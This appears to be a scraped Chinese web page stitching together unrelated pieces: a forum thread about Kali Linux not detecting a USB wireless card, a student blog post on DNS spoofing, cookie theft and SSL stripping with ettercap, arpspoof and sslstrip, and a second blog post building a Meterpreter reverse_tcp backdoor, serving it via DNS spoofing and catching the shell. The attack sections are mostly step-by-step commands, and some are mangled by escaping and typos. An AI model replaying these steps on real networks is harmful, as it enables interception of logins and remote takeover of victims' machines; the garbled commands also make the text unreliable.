iphonex 屏幕 三星为什么要用三星屏幕

查看:7554|回复:3
我再vmware虚拟机中安装了kali linux ,买了一个tp-link wn821n的无线网卡,但是不能识别网卡
论坛首席记者
估计是没驱动,再等个半年或一年试试吧,或者改用有线。我的电脑也是因为无法识别无线网卡就卸载了
菜刀在手,问天下谁是英雄
几个常用的无线命令必须掌握,还有驱动可以在官网找找。
你的网卡型号可能没有linux的驱动,去官网查查吧。我记得linux有一个支持的网卡列表的。。。如何用kali Linux进行DNS欺骗、窃取cookies,使用SSLstrip - 博客频道 - CSDN.NET
huxdl的博客
由于入侵检测这门课要做PPT讲解,所以我研究了一下Kali linux上的一些实验,首先介绍一下kali linux:
按照官方网站的定义,Kali Linux是一个高级渗透测试和安全审计Linux发行版。作为使用者,我简单的把它理解为,一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用。也可称之为平台或者框架。集成超过300个渗透测试工具。(好像很好玩的样子)
Kali Linux面向专业的渗透测试和安全审计,因此,Kali Linux已经进行了如下的多处核心的修改:
单用户,设计成root权限登录:
  默认禁用网络服务:Kali Linux包含了默认禁用网络服务的sysvinit
hooks,它们允许用户在Kali Linux安装各种的服务,允许用户安装各种包,同时仍然确保我们默认的发行版安全.附加的服务,例如蓝牙也会被默认列入黑名单。
实验环境:Kali linux,CentOS 处于同一网段
(一)DNS(Domain Name System,域名系统)欺骗:
DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。
在kali linux终端输入 ifconfig查看ip地址
主机:192.168.113.129
要攻击的主机:192.168.113.131
打开Ettercap
利用locate找到文件的位置
Locate etter.conf
文本编辑etter.conf
gedit /etc/ettercap/etter.conf
这里的参数设成0
去掉前面的#,也叫作哈希标识,打开Iptables
打开ettercap,首先scan forhosts然后打开host list
将192.168.113.2设为target2,192.168.113.131设为target1
这里的192.168.113.2是网关,可以用route -n查看
然后我们转到中间人攻击的选项
选择ARP毒化mitm--ARP Poisoning--sniff remote connections
用于攻击个人以及企业的最常见的网络攻击方式就是中间人攻击(MITM)。作为一种主动窃听攻击方式,中间人攻击方式主要是通过与目标机器建立连接并在目标机器间传递信息来发动攻击。在这种情况下,用户会认为自己正在与另一名用户直接通信,而实际上,通过主机的通信流量正在对用户执行攻击。最终结果是,攻击主机不仅能截取重要信息,而且能够注入数据流来进一步控制受害用户。
打开plugins 点击DNS欺骗插件dns_sproof来激活它
然后进入文本编辑修改etter.dns
终端命令:gedit /etc/ettercap/etter.dns
接着跳转到
var文件夹 www文件夹 然后是html文件夹
index.html打开是这样的,我们现在选择文本编辑它
开启阿帕奇服务器,这样我们的机子就变成网页服务器了
命令:service apache2 start
接下来,在目标主机centos上输入KAIL的IP地址
我们可以在ettercap看到,被定位到168.192.113.129
(二)窃取cookies
首先说明一下:
http:超文本传输协议(HyperText Transfer Protocol)是互联网上应用最为广泛的一种网络协议。所有的WWW文件都必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法。
https:安全超文本传输协议(Secure Hypertext Transfer Protocol)是以安全为目标的HTTP通道,简单讲是HTTP的安全版。即HTTP下加入SSL层(SecureSockets Layer 安全套接层)),HTTPS的安全基础是SSL,因此加密的详细内容就需要SSL。
这个实验只能在http网站上完成。
打开ettercap,扫描
将192.168.113.2加入target1
192.168.113.131加入target2
点击打开mitm,打开arp毒化
然后开启嗅探
先在Kali linux打开wireshark,搜索http.cookies
再在另一台虚拟机上进入某个http网站,输入用户名和密码登录账户
然后我们就可以在wireshark中看到报文了
将第一条复制成纯文本
进入这个http网页,打开tools—cookies manager,添加cookies,content里填写刚刚复制的内容
(没有装cookies manager可以在火狐的附加组件中下载,反正是个能注入cookies的插件就行)
在ettercap中可以看见你刚刚输入的用户名和密码的明文了,我这里对网站和用户名密码都打了马赛克
(三)sslstrip配置
尝试访问https的网站,路由器会把受害者的访问请求发送给我们,攻击者把https转换成http协议,然后扣下报文中的用户名和密码,攻击者会把请求报文发回给路由器,然后路由器把这个请求再发送给网站。实施攻击的时候,主机和目标主机都处在一个局域网才行。
SSL欺骗步骤:劫持HTTPS通信
1. 客户端与web服务器间的流量被拦截
2. 当遇到HTTPS URS时,sslstrip使用HTTP链接替换它,并保存了这种变化的映射
3. 攻击机模拟客户端向服务器提供证书
4. 从安全网站收到流量提供给客户端
  这个过程进展很顺利,服务器认为其仍然在接收SSL流量,服务器无法辨别任何改变。用户可以感觉到唯一不同的是,浏览器中不会标记HTTPS,所以某些用户还是能够看出不对劲。
打开终端:
命令:echo 1 & /proc/sys/net/ipv4/ip_forward
然后配置一下路由表,路由表是用来将一个端口的所有数据传送到另一个端口
命令:iptables -t nat -A PREROUTING -p tcp --destination -port 80 -j REDIRECT --to-port 8080
NAT 一定的基础
-T 匹配的表 NAT表 :PREROUTING 修改来的包
:POSTROUTING 修改准备发出的包
-A 表示加入高级选项
-P 协议类型
-J 表示把目标80端口的数据包转到其他端口 上述命令是8080端口
然后Route –n查询网关
然后使用nmap
Arpspoof –i etho –t 192.168.113..113.2这样我们的目标流量就会被重定向
然后再在另一个窗口上输入 sslstrip –l 8080
用sslstrip工具侦听发往8080端口的数据
还会把流量重定向
用IE浏览器,因为火狐会被强制SSL
用cat sslstrip.log可以看到用户名和密码的明文
排名:千里之外1、安装在virtualbox里的kali无法使用所在物理机的wifi
2、必须通过usb方式,如图所示
3、所使用的usb无线网卡必须是kali2.0支持的
4、我的型号是TL-WN823N 2.0 154TF1,所以没有适配成功,因为这块无线网卡支持的linux内核比较低,
5、可以在kali的论坛里查看相关帮助信息:https://forums.kali.org/forum.php
6、下图是VM的USB安装方法:http://www.aircrack-ng.org/doku.php?id=install_aircrack#manually_attaching_usb_device
7、下面是aircrack支持的芯片:
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
8、在kali里的lib/modules/xxx-kali-xxx/kernal/drivers/net/wireless 文件夹下查看有哪些支持网卡的驱动,再进行有针对性的选购
阅读(...) 评论()安全检查中...
请打开浏览器的javascript,然后刷新浏览器
< 浏览器安全检查中...
还剩 5 秒&kali-Linux_DNS欺骗实现内网渗透 | 金笔头博客 欢迎访问金笔头博客,本博客是一个关注网站建设、软件编程、商务智能、信息安全和Linux的独立博客,博文为个人学习笔记,记录学习历程,欢迎各位大牛指正。20M带宽1TB流量VPS推荐,个人博客站点,shadowsocks/墙外VPN服务器首选,上Google看youtube视频720P无压力,价格低至$2.5元/月,Comments and suggestions from all readers are welcome. Email: 建议使用火狐和谷歌浏览器浏览本站.如果你喜欢本站,试试【Ctrl + D】 收藏吧!
环境部署:kali-Linux + Windows XP SP3所需工具:Msf + ettercap + apache2目标主机:192.168.1.12攻击主机:192.168.1.71.首先用msfpayload 生成内个有效的WIN可执行后门root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 X & /var/www/update.exe查看生成的后门程序2.编辑HTML页面,因为是测试,所以这里随便编辑一下,只要能下载后门程序就行,如精心编辑,将更具有迷惑性。3.启动apache2 start4.启动msfroot@kali:~# msfconsole5.加载漏洞模块和设置攻击载荷并设置参数msf & use exploit/multi/handlermsf exploit(handler) & set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD =& windows/meterpreter/reverse_tcpmsf exploit(handler) & set LHOST 192.168.1.7LHOST =& 192.168.1.7msf exploit(handler) & exploit6.查找etter.dns并编辑root@kali:~# locate etter.dns/etc/ettercap/etter.dnsroot@kali:~# leafpad /etc/ettercap/etter.dns7.进行root@kali:~# ettercap -T -q -i wlan0 -P dns_spoof -M arp /192.168.1.12/ //注:第一个//中间为待欺骗的IP地址,留空则为当前局域网所有IP此时,目标主机打开任何网页都会指向如下网页只要目标主机点击click me并运行exe后门Msf将获取一个shell code打开目标主机的shell,即cmd窗口,接下来就可以在目标主机上做任何事情了…[player autoplay=&#43;]金笔头博客, 版权所有丨如未注明 , 均为原创, 转载请注明!

我要回帖

更多关于 iphonex用的什么屏幕 的文章

 

随机推荐